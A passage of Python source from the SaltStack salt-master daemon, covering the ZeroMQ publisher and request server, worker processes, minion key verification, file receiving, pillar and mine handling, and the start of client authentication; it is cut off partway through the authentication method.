HAS_PYTHON_SYSTEMD = False
log = logging.getLogger(__name__)
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(
'Process did not die with terminate(): {0}'.format(
proc.pid
)
)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
class SMaster(object):
'''
Create a simple salt-master, this will generate the top level master
'''
def __init__(self, opts):
'''
Create a salt master server instance
'''
self.opts = opts
self.master_key = salt.crypt.MasterKeys(self.opts)
self.key = self.__prep_key()
self.crypticle = self.__prep_crypticle()
def __prep_crypticle(self):
'''
Return the crypticle used for AES
'''
return salt.crypt.Crypticle(self.opts, self.opts['aes'])
def __prep_key(self):
'''
A key needs to be placed in the filesystem with permissions 0400 so
clients are required to run as root.
'''
return salt.daemons.masterapi.access_keys(self.opts)
class Master(SMaster):
'''
The salt master server
'''
def __init__(self, opts):
'''
Create a salt master server instance
'''
# Warn if ZMQ < 3.2
if not(hasattr(zmq, 'zmq_version_info')) or \
zmq.zmq_version_info() < (3, 2):
# PyZMQ 2.1.9 does not have zmq_version_info
log.warning('You have a version of ZMQ less than ZMQ 3.2! There '
'are known connection keep-alive issues with ZMQ < '
'3.2 which may result in loss of contact with '
'minions. Please upgrade your ZMQ!')
SMaster.__init__(self, opts)
def _clear_old_jobs(self):
'''
The clean old jobs function is the general passive maintenance process
controller for the Salt master. This is where any data that needs to
be cleanly maintained from the master is maintained.
'''
# Set up search object
search = salt.search.Search(self.opts)
# Make Start Times
last = int(time.time())
rotate = int(time.time())
# Init fileserver manager
fileserver = salt.fileserver.Fileserver(self.opts)
# Load Runners
runners = salt.loader.runner(self.opts)
# Load Returners
returners = salt.loader.returners(self.opts, {})
# Init Scheduler
schedule = salt.utils.schedule.Schedule(self.opts, runners, returners=returners)
ckminions = salt.utils.minions.CkMinions(self.opts)
# Make Event bus for firing
event = salt.utils.event.MasterEvent(self.opts['sock_dir'])
# Init any values needed by the git ext pillar
pillargitfs = salt.daemons.masterapi.init_git_pillar(self.opts)
# Clean out the fileserver backend cache
salt.daemons.masterapi.clean_fsbackend(self.opts)
old_present = set()
while True:
now = int(time.time())
loop_interval = int(self.opts['loop_interval'])
if (now - last) >= loop_interval:
salt.daemons.masterapi.clean_old_jobs(self.opts)
salt.daemons.masterapi.clean_expired_tokens(self.opts)
if self.opts.get('publish_session'):
if now - rotate >= self.opts['publish_session']:
salt.crypt.dropfile(
self.opts['cachedir'],
self.opts['user'])
rotate = now
if self.opts.get('search'):
if now - last >= self.opts['search_index_interval']:
search.index()
salt.daemons.masterapi.fileserver_update(fileserver)
# check how close to FD limits you are
salt.utils.verify.check_max_open_files(self.opts)
try:
for pillargit in pillargitfs:
pillargit.update()
except Exception as exc:
log.error('Exception {0} occurred in file server update '
'for git_pillar module.'.format(exc))
try:
schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if schedule.loop_interval < loop_interval:
loop_interval = schedule.loop_interval
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
last = now
if self.opts.get('presence_events', False):
present = ckminions.connected_ids()
new = present.difference(old_present)
lost = old_present.difference(present)
if new or lost:
# Fire new minions present event
data = {'new': list(new),
'lost': list(lost)}
event.fire_event(data, tagify('change', 'presence'))
data = {'present': list(present)}
event.fire_event(data, tagify('present', 'presence'))
old_present = present
try:
time.sleep(loop_interval)
except KeyboardInterrupt:
break
def __set_max_open_files(self):
# Let's check to see how our max open files(ulimit -n) setting is
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
if mof_h == resource.RLIM_INFINITY:
# Unclear what to do with infinity... OSX reports RLIM_INFINITY as
# hard limit,but raising to anything above soft limit fails...
mof_h = mof_s
log.info(
'Current values for max open files soft/hard setting: '
'{0}/{1}'.format(
mof_s, mof_h
)
)
# Let's grab, from the configuration file, the value to raise max open
# files to
mof_c = self.opts['max_open_files']
if mof_c > mof_h:
# The configured value is higher than what's allowed
log.info(
'The value for the \'max_open_files\' setting, {0}, is higher '
'than what the user running salt is allowed to raise to, {1}. '
'Defaulting to {1}.'.format(mof_c, mof_h)
)
mof_c = mof_h
if mof_s < mof_c:
# There's room to raise the value. Raise it!
log.info('Raising max open files value to {0}'.format(mof_c))
resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h))
try:
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
log.info(
'New values for max open files soft/hard values: '
'{0}/{1}'.format(mof_s, mof_h)
)
except ValueError:
# https://github.com/saltstack/salt/issues/1991#issuecomment-13025595
# A user under OSX reported that our 100000 default value is
# still too high.
log.critical(
'Failed to raise max open files setting to {0}. If this '
'value is too low. The salt-master will most likely fail '
'to run properly.'.format(
mof_c
)
)
def _pre_flight(self):
'''
Run pre flight checks, if anything in this method fails then the master
should not start up
'''
errors = []
fileserver = salt.fileserver.Fileserver(self.opts)
if not fileserver.servers:
errors.append(
'Failed to load fileserver backends, the configured backends '
'are: {0}'.format(', '.join(self.opts['fileserver_backend']))
)
if not self.opts['fileserver_backend']:
errors.append('No fileserver backends are configured')
if errors:
for error in errors:
log.error(error)
log.error('Master failed pre flight checks, exiting\n')
sys.exit(salt.exitcodes.EX_GENERIC)
def start(self):
'''
Turn on the master server components
'''
self._pre_flight()
log.info(
'salt-master is starting as user {0!r}'.format(salt.utils.get_user())
)
enable_sigusr1_handler()
enable_sigusr2_handler()
self.__set_max_open_files()
clear_old_jobs_proc = multiprocessing.Process(
target=self._clear_old_jobs)
clear_old_jobs_proc.start()
reqserv = ReqServer(
self.opts,
self.crypticle,
self.key,
self.master_key)
reqserv.start_publisher()
reqserv.start_event_publisher()
reqserv.start_reactor()
reqserv.start_halite()
def sigterm_clean(signum, frame):
'''
Cleaner method for stopping multiprocessing processes when a
SIGTERM is encountered. This is required when running a salt
master under a process minder like daemontools
'''
log.warn(
'Caught signal {0}, stopping the Salt Master'.format(
signum
)
)
clean_proc(clear_old_jobs_proc)
clean_proc(reqserv.publisher)
clean_proc(reqserv.eventpublisher)
if hasattr(reqserv, 'halite'):
clean_proc(reqserv.halite)
if hasattr(reqserv, 'reactor'):
clean_proc(reqserv.reactor)
for proc in reqserv.work_procs:
clean_proc(proc)
raise MasterExit
signal.signal(signal.SIGTERM, sigterm_clean)
try:
reqserv.run()
except KeyboardInterrupt:
# Shut the master down gracefully on SIGINT
log.warn('Stopping the Salt Master')
raise SystemExit('\nExiting on Ctrl-c')
class Halite(multiprocessing.Process):
'''
Manage the Halite server
'''
def __init__(self, hopts):
super(Halite, self).__init__()
self.hopts = hopts
def run(self):
'''
Fire up halite!
'''
salt.utils.appendproctitle(self.__class__.__name__)
halite.start(self.hopts)
class Publisher(multiprocessing.Process):
'''
The publishing interface, a simple zeromq publisher that sends out the
commands.
'''
def __init__(self, opts):
super(Publisher, self).__init__()
self.opts = opts
def run(self):
'''
Bind to the interface specified in the configuration file
'''
salt.utils.appendproctitle(self.__class__.__name__)
# Set up the context
context = zmq.Context(1)
# Prepare minion publish socket
pub_sock = context.socket(zmq.PUB)
# if 2.1 >= zmq < 3.0, we only have one HWM setting
try:
pub_sock.setsockopt(zmq.HWM, self.opts.get('pub_hwm', 1000))
# in zmq >= 3.0, there are separate send and receive HWM settings
except AttributeError:
pub_sock.setsockopt(zmq.SNDHWM, self.opts.get('pub_hwm', 1000))
pub_sock.setsockopt(zmq.RCVHWM, self.opts.get('pub_hwm', 1000))
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
pub_sock.setsockopt(zmq.IPV4ONLY, 0)
pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts)
# Prepare minion pull socket
pull_sock = context.socket(zmq.PULL)
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
salt.utils.check_ipc_path_max_len(pull_uri)
# Start the minion command publisher
log.info('Starting the Salt Publisher on {0}'.format(pub_uri))
pub_sock.bind(pub_uri)
# Securely create socket
log.info('Starting the Salt Puller on {0}'.format(pull_uri))
old_umask = os.umask(0177)
try:
pull_sock.bind(pull_uri)
finally:
os.umask(old_umask)
try:
while True:
# Catch and handle EINTR from when this process is sent
# SIGUSR1 gracefully so we don't choke and die horribly
try:
package = pull_sock.recv()
unpacked_package = salt.payload.unpackage(package)
payload = unpacked_package['payload']
if self.opts['zmq_filtering']:
# if you have a specific topic list, use that
if 'topic_lst' in unpacked_package:
for topic in unpacked_package['topic_lst']:
# zmq filters are substring match, hash the topic
# to avoid collisions
htopic = hashlib.sha1(topic).hexdigest()
pub_sock.send(htopic, flags=zmq.SNDMORE)
pub_sock.send(payload)
# otherwise its a broadcast
else:
# TODO: constants file for "broadcast"
pub_sock.send('broadcast', flags=zmq.SNDMORE)
pub_sock.send(payload)
else:
pub_sock.send(payload)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
except KeyboardInterrupt:
if pub_sock.closed is False:
pub_sock.setsockopt(zmq.LINGER, 1)
pub_sock.close()
if pull_sock.closed is False:
pull_sock.setsockopt(zmq.LINGER, 1)
pull_sock.close()
if context.closed is False:
context.term()
class ReqServer(object):
'''
Starts up the master request server, minions send results to this
interface.
'''
def __init__(self, opts, crypticle, key, mkey):
self.opts = opts
self.master_key = mkey
self.context = zmq.Context(self.opts['worker_threads'])
# Prepare the zeromq sockets
self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts)
self.clients = self.context.socket(zmq.ROUTER)
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.clients.setsockopt(zmq.IPV4ONLY, 0)
self.workers = self.context.socket(zmq.DEALER)
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
# Prepare the AES key
self.key = key
self.crypticle = crypticle
def __bind(self):
'''
Binds the reply server
'''
dfn = os.path.join(self.opts['cachedir'], '.dfn')
if os.path.isfile(dfn):
try:
os.remove(dfn)
except os.error:
pass
log.info('Setting up the master communication server')
self.clients.bind(self.uri)
self.work_procs = []
for ind in range(int(self.opts['worker_threads'])):
self.work_procs.append(MWorker(self.opts,
self.master_key,
self.key,
self.crypticle,
)
)
for ind, proc in enumerate(self.work_procs):
log.info('Starting Salt worker process {0}'.format(ind))
proc.start()
self.workers.bind(self.w_uri)
try:
if HAS_PYTHON_SYSTEMD and systemd.daemon.booted():
systemd.daemon.notify('READY=1')
except SystemError:
# Daemon wasn't started by systemd
pass
while True:
try:
zmq.device(zmq.QUEUE, self.clients, self.workers)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
def start_publisher(self):
'''
Start the salt publisher interface
'''
# Start the publisher
self.publisher = Publisher(self.opts)
self.publisher.start()
def start_event_publisher(self):
'''
Start the salt publisher interface
'''
# Start the publisher
self.eventpublisher = salt.utils.event.EventPublisher(self.opts)
self.eventpublisher.start()
def start_reactor(self):
'''
Start the reactor, but only if the reactor interface is configured
'''
if self.opts.get('reactor'):
self.reactor = salt.utils.event.Reactor(self.opts)
self.reactor.start()
def start_halite(self):
'''
If halite is configured and installed, fire it up!
'''
if HAS_HALITE and 'halite' in self.opts:
log.info('Halite: Starting up ...')
self.halite = Halite(self.opts['halite'])
self.halite.start()
elif 'halite' in self.opts:
log.info('Halite: Not configured, skipping.')
else:
log.debug('Halite: Unavailable.')
def run(self):
'''
Start up the ReqServer
'''
self.__bind()
def destroy(self):
if self.clients.closed is False:
self.clients.setsockopt(zmq.LINGER, 1)
self.clients.close()
if self.workers.closed is False:
self.workers.setsockopt(zmq.LINGER, 1)
self.workers.close()
if self.context.closed is False:
self.context.term()
# Also stop the workers
for worker in self.work_procs:
if worker.is_alive() is True:
worker.terminate()
def __del__(self):
self.destroy()
class MWorker(multiprocessing.Process):
'''
The worker multiprocess instance to manage the backend operations for the
salt master.
'''
def __init__(self,
opts,
mkey,
key,
crypticle):
multiprocessing.Process.__init__(self)
self.opts = opts
self.serial = salt.payload.Serial(opts)
self.crypticle = crypticle
self.mkey = mkey
self.key = key
self.k_mtime = 0
def __bind(self):
'''
Bind to the local port
'''
context = zmq.Context(1)
socket = context.socket(zmq.REP)
w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Worker binding to socket {0}'.format(w_uri))
try:
socket.connect(w_uri)
while True:
try:
package = socket.recv()
self._update_aes()
payload = self.serial.loads(package)
ret = self.serial.dumps(self._handle_payload(payload))
socket.send(ret)
# don't catch keyboard interrupts, just re-raise them
except KeyboardInterrupt:
raise
# catch all other exceptions, so we don't go defunct
except Exception as exc:
# Properly handle EINTR from SIGUSR1
if isinstance(exc, zmq.ZMQError) and exc.errno == errno.EINTR:
continue
log.critical('Unexpected Error in Mworker',
exc_info=True)
# lets just redo the socket (since we won't know what state its in).
# This protects against a single minion doing a send but not
# recv and thereby causing an MWorker process to go defunct
del socket
socket = context.socket(zmq.REP)
socket.connect(w_uri)
# Changes here create a zeromq condition, check with thatch45 before
# making any zeromq changes
except KeyboardInterrupt:
socket.close()
def _handle_payload(self, payload):
'''
The _handle_payload method is the key method used to figure out what
needs to be done with communication to the server
'''
try:
key = payload['enc']
load = payload['load']
except KeyError:
return ''
return {'aes': self._handle_aes,
'pub': self._handle_pub,
'clear': self._handle_clear}[key](load)
def _handle_clear(self, load):
'''
Take care of a cleartext command
'''
log.info('Clear payload received with command {cmd}'.format(**load))
if load['cmd'].startswith('__'):
return False
return getattr(self.clear_funcs, load['cmd'])(load)
def _handle_pub(self, load):
'''
Handle a command sent via a public key pair
'''
if load['cmd'].startswith('__'):
return False
log.info('Pubkey payload received with command {cmd}'.format(**load))
def _handle_aes(self, load):
'''
Handle a command sent via an AES key
'''
try:
data = self.crypticle.loads(load)
except Exception:
return ''
if 'cmd' not in data:
log.error('Received malformed command {0}'.format(data))
return {}
log.info('AES payload received with command {0}'.format(data['cmd']))
if data['cmd'].startswith('__'):
return False
return self.aes_funcs.run_func(data['cmd'], data)
def _update_aes(self):
'''
Check to see if a fresh AES key is available and update the components
of the worker
'''
dfn = os.path.join(self.opts['cachedir'], '.dfn')
try:
stats = os.stat(dfn)
except os.error:
return
if stats.st_mode != 0100400:
# Invalid dfn, return
return
if stats.st_mtime > self.k_mtime:
# new key, refresh crypticle
with salt.utils.fopen(dfn) as fp_:
aes = fp_.read()
if len(aes) != 76:
return
self.crypticle = salt.crypt.Crypticle(self.opts, aes)
self.clear_funcs.crypticle = self.crypticle
self.clear_funcs.opts['aes'] = aes
self.aes_funcs.crypticle = self.crypticle
self.aes_funcs.opts['aes'] = aes
self.k_mtime = stats.st_mtime
def run(self):
'''
Start a Master Worker
'''
salt.utils.appendproctitle(self.__class__.__name__)
self.clear_funcs = ClearFuncs(
self.opts,
self.key,
self.mkey,
self.crypticle)
self.aes_funcs = AESFuncs(self.opts, self.crypticle)
self.__bind()
class AESFuncs(object):
'''
Set up functions that are available when the load is encrypted with AES
'''
# The AES Functions:
#
def __init__(self, opts, crypticle):
self.opts = opts
self.event = salt.utils.event.MasterEvent(self.opts['sock_dir'])
self.serial = salt.payload.Serial(opts)
self.crypticle = crypticle
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make a client
self.local = salt.client.get_local_client(self.opts['conf_file'])
# Create the master minion to access the external job cache
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False)
self.__setup_fileserver()
self.masterapi = salt.daemons.masterapi.RemoteFuncs(opts)
def __setup_fileserver(self):
'''
Set the local file objects from the file server interface
'''
fs_ = salt.fileserver.Fileserver(self.opts)
self._serve_file = fs_.serve_file
self._file_hash = fs_.file_hash
self._file_list = fs_.file_list
self._file_list_emptydirs = fs_.file_list_emptydirs
self._dir_list = fs_.dir_list
self._symlink_list = fs_.symlink_list
self._file_envs = fs_.envs
def __verify_minion(self, id_, token):
'''
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
'''
if not salt.utils.verify.valid_id(self.opts, id_):
return False
pub_path = os.path.join(self.opts['pki_dir'], 'minions', id_)
with salt.utils.fopen(pub_path, 'r') as fp_:
minion_pub = fp_.read()
tmp_pub = salt.utils.mkstemp()
with salt.utils.fopen(tmp_pub, 'w+') as fp_:
fp_.write(minion_pub)
pub = None
try:
pub = RSA.load_pub_key(tmp_pub)
except RSA.RSAError as err:
log.error('Unable to load temporary public key "{0}": {1}'
.format(tmp_pub, err))
try:
os.remove(tmp_pub)
if pub.public_decrypt(token, 5) == 'salt':
return True
except RSA.RSAError as err:
log.error('Unable to decrypt token: {0}'.format(err))
log.error('Salt minion claiming to be {0} has attempted to'
'communicate with the master and could not be verified'
.format(id_))
return False
def __verify_minion_publish(self, clear_load):
'''
Verify that the passed information authorized a minion to execute
'''
# Verify that the load is valid
if 'peer' not in self.opts:
return False
if not isinstance(self.opts['peer'], dict):
return False
if any(key not in clear_load for key in ('fun', 'arg', 'tgt', 'ret', 'tok', 'id')):
return False
# If the command will make a recursive publish don't run
if clear_load['fun'].startswith('publish.'):
return False
# Check the permissions for this minion
if not self.__verify_minion(clear_load['id'], clear_load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warn(
(
'Minion id {0} is not who it says it is and is attempting '
'to issue a peer command'
).format(clear_load['id'])
)
return False
clear_load.pop('tok')
perms = []
for match in self.opts['peer']:
if re.match(match, clear_load['id']):
# This is the list of funcs/modules!
if isinstance(self.opts['peer'][match], list):
perms.extend(self.opts['peer'][match])
if ',' in clear_load['fun']:
# 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']]
clear_load['fun'] = clear_load['fun'].split(',')
arg_ = []
for arg in clear_load['arg']:
arg_.append(arg.split())
clear_load['arg'] = arg_
# finally, check the auth of the load
return self.ckminions.auth_check(
perms,
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
def __verify_load(self, load, verify_keys):
'''
A utility function to perform common verification steps.
verify_keys: A list of strings that should be present in a
given load.
'''
if any(key not in load for key in verify_keys):
return False
if 'tok' not in load:
log.error(
'Received incomplete call from {0} for {1!r}, missing {2!r}'
.format(
load['id'],
inspect_stack()['co_name'],
'tok'
))
return False
if not self.__verify_minion(load['id'], load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warn(
'Minion id {0} is not who it says it is!'.format(
load['id']
)
)
return False
if 'tok' in load:
load.pop('tok')
return load
def _ext_nodes(self, load):
'''
Return the results from an external node classifier if one is
specified
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
return self.masterapi._ext_nodes(load, skip_verify=True)
def _master_opts(self, load):
'''
Return the master options to the minion
'''
mopts = {}
file_roots = {}
envs = self._file_envs()
for saltenv in envs:
if saltenv not in file_roots:
file_roots[saltenv] = []
mopts['file_roots'] = file_roots
if load.get('env_only'):
return mopts
mopts['renderer'] = self.opts['renderer']
mopts['failhard'] = self.opts['failhard']
mopts['state_top'] = self.opts['state_top']
mopts['nodegroups'] = self.opts['nodegroups']
mopts['state_auto_order'] = self.opts['state_auto_order']
mopts['state_events'] = self.opts['state_events']
mopts['jinja_lstrip_blocks'] = self.opts['jinja_lstrip_blocks']
mopts['jinja_trim_blocks'] = self.opts['jinja_trim_blocks']
return mopts
def _mine_get(self, load):
'''
Gathers the data from the specified minions' mine
'''
load = self.__verify_load(load, ('id', 'tgt', 'fun', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_get(load, skip_verify=True)
def _mine(self, load):
'''
Return the mine data
'''
load = self.__verify_load(load, ('id', 'data', 'tok'))
if load is False:
return {}
return self.masterapi._mine(load, skip_verify=True)
def _mine_delete(self, load):
'''
Allow the minion to delete a specific function from its own mine
'''
load = self.__verify_load(load, ('id', 'fun', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_delete(load)
def _mine_flush(self, load):
'''
Allow the minion to delete all of its own mine contents
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_flush(load, skip_verify=True)
def _file_recv(self, load):
'''
Allows minions to send files to the master, files are sent to the
master file cache
'''
if any(key not in load for key in ('id', 'path', 'loc')):
return False
if not self.opts['file_recv'] or os.path.isabs(load['path']):
return False
if os.path.isabs(load['path']) or '../' in load['path']:
# Can overwrite master files!!
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
file_recv_max_size = 1024*1024 * self.opts.get('file_recv_max_size', 100)
if 'loc' in load and load['loc'] < 0:
log.error('Invalid file pointer: load[loc] < 0')
return False
if len(load['data']) + load.get('loc', 0) > file_recv_max_size:
log.error(
'Exceeding file_recv_max_size limit: {0}'.format(
file_recv_max_size
)
)
return False
if 'tok' not in load:
log.error(
'Received incomplete call from {0} for {1!r}, missing {2!r}'
.format(
load['id'],
inspect_stack()['co_name'],
'tok'
))
return False
if not self.__verify_minion(load['id'], load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warn(
'Minion id {0} is not who it says it is!'.format(
load['id']
)
)
return {}
load.pop('tok')
cpath = os.path.join(
self.opts['cachedir'],
'minions',
load['id'],
'files',
load['path'])
cdir = os.path.dirname(cpath)
if not os.path.isdir(cdir):
try:
os.makedirs(cdir)
except os.error:
pass
if os.path.isfile(cpath) and load['loc'] != 0:
mode = 'ab'
else:
mode = 'wb'
with salt.utils.fopen(cpath, mode) as fp_:
if load['loc']:
fp_.seek(load['loc'])
fp_.write(load['data'])
return True
def _pillar(self, load):
'''
Return the pillar data for the minion
'''
if any(key not in load for key in ('id', 'grains')):
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
load['grains']['id'] = load['id']
mods = set()
for func in self.mminion.functions.values():
mods.add(func.__module__)
for mod in mods:
sys.modules[mod].__grains__ = load['grains']
pillar_dirs = {}
pillar = salt.pillar.Pillar(
self.opts,
load['grains'],
load['id'],
load.get('saltenv', load.get('env')),
load.get('ext'),
self.mminion.functions)
data = pillar.compile_pillar(pillar_dirs=pillar_dirs)
if self.opts.get('minion_data_cache', False):
cdir = os.path.join(self.opts['cachedir'], 'minions', load['id'])
if not os.path.isdir(cdir):
os.makedirs(cdir)
datap = os.path.join(cdir, 'data.p')
with salt.utils.fopen(datap, 'w+b') as fp_:
fp_.write(
self.serial.dumps(
{'grains': load['grains'],
'pillar': data})
)
for mod in mods:
sys.modules[mod].__grains__ = self.opts['grains']
return data
def _minion_event(self, load):
'''
Receive an event from the minion and fire it on the master event
interface
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
self.masterapi._minion_event(load)
def _return(self, load):
'''
Handle the return data sent from the minions
'''
# If the return data is invalid, just ignore it
if any(key not in load for key in ('return', 'jid', 'id')):
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
if load['jid'] == 'req':
# The minion is returning a standalone job, request a jobid
load['arg'] = load.get('arg', load.get('fun_args', []))
load['tgt_type'] = 'glob'
load['tgt'] = load['id']
prep_fstr = '{0}.prep_jid'.format(self.opts['master_job_cache'])
load['jid'] = self.mminion.returners[prep_fstr](nocache=load.get('nocache', False))
# save the load, since we don't have it
saveload_fstr = '{0}.save_load'.format(self.opts['master_job_cache'])
self.mminion.returners[saveload_fstr](load['jid'], load)
log.info('Got return from {id} for job {jid}'.format(**load))
self.event.fire_event(load, load['jid']) # old dup event
self.event.fire_event(
load, tagify([load['jid'], 'ret', load['id']], 'job'))
self.event.fire_ret_load(load)
# if you have a job_cache, or an ext_job_cache, don't write to the regular master cache
if not self.opts['job_cache'] or self.opts.get('ext_job_cache'):
return
# otherwise, write to the master cache
fstr = '{0}.returner'.format(self.opts['master_job_cache'])
self.mminion.returners[fstr](load)
def _syndic_return(self, load):
'''
Receive a syndic minion return and format it to look like returns from
individual minions.
'''
# Verify the load
if any(key not in load for key in ('return', 'jid', 'id')):
return None
# if we have a load, save it
if 'load' in load:
fstr = '{0}.save_load'.format(self.opts['master_job_cache'])
self.mminion.returners[fstr](load['jid'], load)
# Format individual return loads
for key, item in load['return'].items():
ret = {'jid': load['jid'],
'id': key,
'return': item}
if 'out' in load:
ret['out'] = load['out']
self._return(ret)
def minion_runner(self, clear_load):
'''
Execute a runner from a minion, return the runner's function data
'''
load = self.__verify_load(clear_load, ('fun', 'arg', 'id', 'tok'))
if load is False:
return {}
else:
return self.masterapi.minion_runner(clear_load)
def pub_ret(self, load):
'''
Request the return data from a specific jid, only allowed
if the requesting minion also initialted the execution.
'''
load = self.__verify_load(load, ('jid', 'id', 'tok'))
if load is False:
return {}
# Check that this minion can access this data
auth_cache = os.path.join(
self.opts['cachedir'],
'publish_auth')
if not os.path.isdir(auth_cache):
os.makedirs(auth_cache)
jid_fn = os.path.join(auth_cache, str(load['jid']))
with salt.utils.fopen(jid_fn, 'r') as fp_:
if not load['id'] == fp_.read():
return {}
# Grab the latest and return
return self.local.get_cache_returns(load['jid'])
def minion_pub(self, clear_load):
'''
Publish a command initiated from a minion, this method executes minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
peer:
.*:
- .*
This configuration will enable all minions to execute all commands.
peer:
foo.example.com:
- test.*
This configuration will only allow the minion foo.example.com to
execute commands from the test module
'''
if not self.__verify_minion_publish(clear_load):
return {}
else:
return self.masterapi.minion_pub(clear_load)
def minion_publish(self, clear_load):
'''
Publish a command initiated from a minion, this method executes minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
peer:
.*:
- .*
This configuration will enable all minions to execute all commands.
peer:
foo.example.com:
- test.*
This configuration will only allow the minion foo.example.com to
execute commands from the test module
'''
if not self.__verify_minion_publish(clear_load):
return {}
else:
return self.masterapi.minion_publish(clear_load, skip_verify=True)
def revoke_auth(self, load):
'''
Allow a minion to request revocation of its own key
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return load
else:
return self.masterapi.revoke_auth(load)
def run_func(self, func, load):
'''
Wrapper for running functions executed with AES encryption
'''
# Don't honor private functions
if func.startswith('__'):
return self.crypticle.dumps({})
# Run the func
if hasattr(self, func):
try:
start = time.time()
ret = getattr(self, func)(load)
log.trace(
'Master function call {0} took {1} seconds'.format(
func, time.time() - start
)
)
except Exception:
ret = ''
log.error(
'Error in function {0}:\n'.format(func),
exc_info=True
)
else:
log.error(
'Received function {0} which is unavailable on the master, '
'returning False'.format(
func
)
)
return self.crypticle.dumps(False)
# Don't encrypt the return value for the _return func
# (we don't care about the return value, so why encrypt it?)
if func == '_return':
return ret
if func == '_pillar' and 'id' in load:
if load.get('ver') != '2' and self.opts['pillar_version'] == 1:
# Authorized to return old pillar proto
return self.crypticle.dumps(ret)
# encrypt with a specific AES key
pubfn = os.path.join(self.opts['pki_dir'],
'minions',
load['id'])
key = salt.crypt.Crypticle.generate_key_string()
pcrypt = salt.crypt.Crypticle(
self.opts,
key)
try:
pub = RSA.load_pub_key(pubfn)
except RSA.RSAError:
return self.crypticle.dumps({})
pret = {}
pret['key'] = pub.public_encrypt(key, 4)
pret['pillar'] = pcrypt.dumps(
ret if ret is not False else {}
)
return pret
# AES Encrypt the return
return self.crypticle.dumps(ret)
class ClearFuncs(object):
'''
Set up functions that are safe to execute when commands sent to the master
without encryption and authentication
'''
# The ClearFuncs object encapsulates the functions that can be executed in
# the clear:
# publish (The publish from the LocalClient)
# _auth
def __init__(self, opts, key, master_key, crypticle):
self.opts = opts
self.serial = salt.payload.Serial(opts)
self.key = key
self.master_key = master_key
self.crypticle = crypticle
# Create the event manager
self.event = salt.utils.event.MasterEvent(self.opts['sock_dir'])
# Make a client
self.local = salt.client.get_local_client(self.opts['conf_file'])
# Make an minion checker object
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make an Auth object
self.loadauth = salt.auth.LoadAuth(opts)
# Stand up the master Minion to access returner data
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False)
# Make a wheel object
self.wheel_ = salt.wheel.Wheel(opts)
self.masterapi = salt.daemons.masterapi.LocalFuncs(opts, key)
self.auto_key = salt.daemons.masterapi.AutoKey(opts)
def _auth(self, load):
'''
Authenticate the client, use the sent public key to encrypt the AES key
which was generated at start up.
This method fires an event over the master event manager. The event is
tagged "auth" and returns a dict with information about the auth
event
# Verify that the key we are receiving matches the stored key
# Store the key if it is not there
# Make an RSA key with the pub key
# Encrypt the AES key as an encrypted salt.payload
# Package the return and return it
'''
if not salt.utils.verify.valid_id(self.opts, load['id']):
log.info(
'Authentication request from invalid id {id}'.format(**load)
)
return {'enc': 'clear',
'load': {'ret': False}}
log.info('Authentication request from {id}'.format(**load))
minions = salt.utils.minions.CkMinions(self.opts).connected_ids()
# 0 is default which should be 'unlimited'
if self.opts['max_minions'] > 0:
if not len(minions) < self.opts['max_minions']:
# we reject new minions, minions that are already
# connected must be allowed for the mine, highstate, etc.
if load['id'] not in minions:
msg = ('Too many minions connected (max_minions={0}). '
'Rejecting connection from id '
'{1}'.format(self.opts['max_minions'],
load['id']))
log.info(msg)
eload = {'result': False,
'act': 'full',
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix='auth'))
return {'enc': 'clear',
'load': {'ret': 'full'}}
# Check if key is configured to be auto-rejected/signed
auto_reject = self.auto_key.check_autoreject(load['id'])
auto_sign = self.auto_key.check_autosign(load['id'])
